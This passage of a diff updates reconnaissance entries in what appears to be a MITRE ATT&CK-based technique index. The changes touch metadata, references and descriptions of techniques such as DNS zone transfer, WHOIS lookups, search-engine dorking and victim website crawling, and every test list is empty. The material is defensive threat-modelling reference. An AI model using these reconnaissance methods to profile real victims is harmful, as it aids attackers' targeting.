-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -55864,7 +56541,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55880,8 +56557,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -55903,7 +56578,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55919,8 +56594,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -55948,7 +56621,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55964,33 +56637,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -56004,18 +56677,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -56036,7 +56720,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -56052,39 +56736,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -56092,13 +56774,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -56123,7 +56833,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -56139,8 +56849,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -56162,7 +56870,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -56178,8 +56886,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -56205,7 +56911,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -56223,13 +56929,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56285,7 +56989,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -56336,7 +57040,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -56357,7 +57060,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -56373,8 +57076,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -56396,7 +57097,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -56412,8 +57113,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -56435,7 +57134,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -56451,12 +57150,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -56496,8 +57193,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -56542,11 +57239,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -56586,9 +57282,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -56650,7 +57345,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -56676,7 +57370,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -56697,8 +57391,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -56763,7 +57455,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -56811,7 +57502,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -56833,7 +57523,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56849,34 +57539,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56885,15 +57551,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -56915,7 +57604,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
